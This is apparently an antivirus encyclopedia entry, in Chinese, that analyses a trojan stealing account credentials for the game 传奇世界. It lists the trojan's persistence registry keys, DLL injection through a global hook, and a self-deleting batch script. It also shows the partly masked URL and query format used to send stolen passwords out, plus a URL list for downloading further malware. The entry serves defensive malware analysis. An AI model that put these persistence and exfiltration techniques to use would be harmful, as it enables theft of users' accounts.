Win32.Troj.Lmir.be.22183

核心提示：病毒名称(中文):传奇世界盗号木马22183病毒别名:威胁级别:★☆☆☆☆病毒类型:偷密码的木马病毒长度:22183影响系统:Win9xWinMeWinNTWin2000WinXPWin2003病毒行为:这是一个网游盗号木马，它的目标是《传奇世界》的帐号密码信息，Win32.Troj.Lmir.be.22183，同时，

病毒名称(中文): 传奇世界盗号木马22183
病毒别名:
威胁级别: ★☆☆☆☆
病毒类型: 偷密码的木马
病毒长度: 22183
影响系统: Win9xWinMeWinNTWin2000WinXPWin2003



病毒行为:

这是一个网游盗号木马。它的目标是《传奇世界》的帐号密码信息。同时，它还会下载一些恶意程序到用户电脑中执行。

病毒流程：
1读取文件尾部104个字节

2删除文件
\FileName=C:\PRogramFiles\CommonFiles\MicrosoftShared\MSINFO\SysWFGCQSJ2.dll

3从自身查找名为“DLLFILE”的资源，加载并释放到
C:\ProgramFiles\CommonFiles\MicrosoftShared\MSINFO\SysWFGCQSJ2.dll
然后再把刚才得到的104个资源写入新文件SysWFGCQSJ2.dll的尾部。

4加载该DLL，GetProcaddress得到该DLL的两个导出函数jmpHookOnjmpHookOff
调用jmpHookOn,该函数的作用是下全局钩子，使所有进程加载该DLL。

5注册CLSID组件
HKCR\CLSID\{DC7035B1-E435-4A65-9546-059796785F52}\InProcServer32
"(Default)"="%ProgramFiles%\CommonFiles\MicrosoftShared\MSINFO\SysWFGCQSJ2.dll"

6添加启动项，随系统进程启动
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{DC7035B1-E435-4A65-9546-059796785F52}

7生成bat文件删除原始程序
:try
del"D:\software\RunPE\virus.exe"
ifexist"D:\software\RunPE\virus.exe"gototry
del%0

病毒所释放的SysWFGCQSJ2.dll文件的作用
DLL被加载后
1，判定当前进程是否是桌面进程，若是跳到2.

2，移动文件MoveFileExA
0006F3E800930128|ExistingName="C:\WINDOWS\system32\VerCLSID.exe"
0006F3EC00930158|NewName="C:\WINDOWS\system32\VerCLSID.bak"

3查找窗口FindWindow，若没查找，则创建一个新线程
0006F604003F6AD4|Class="ListBox"
0006F608003F6AC8\Title="dll_wfgCQSJ"
该线程的作用是：
1查找窗口|Class="ListBox"\Title="dll_wfgCQSJ"，若没找到，则创建一个新窗口

2加载DLLC:\ProgramFiles\CommonFiles\MicrosoftShared\MSINFO\SysWFGCQSJ2.dll

3查找窗口/Title="ZXY_wfgCQSJ"|Class="ListBox"，判定该窗口是否存在，若存在则发送WM_QUITE消息

4SetWindowsHookExA设置WH_GETMESSAGE钩子，钩子回调函数的作用是：
获取用户传奇世界账号并以一下形式发送到网络
http://ftp.y***9.com/px/login.aspgameid=&passWord=&quyu=&mirserver=&js1=
&js1zy=&js1dj=&js1sex=
&js2=&js2zy=&js2dj=&js2sex=&zb=<<传奇世界>>附加信息

5设置计时器，计时器回调函数的作用是，从网上下载恶意程序并执行。
恶意网址列表http://www.6***11.cn/txt/url.txt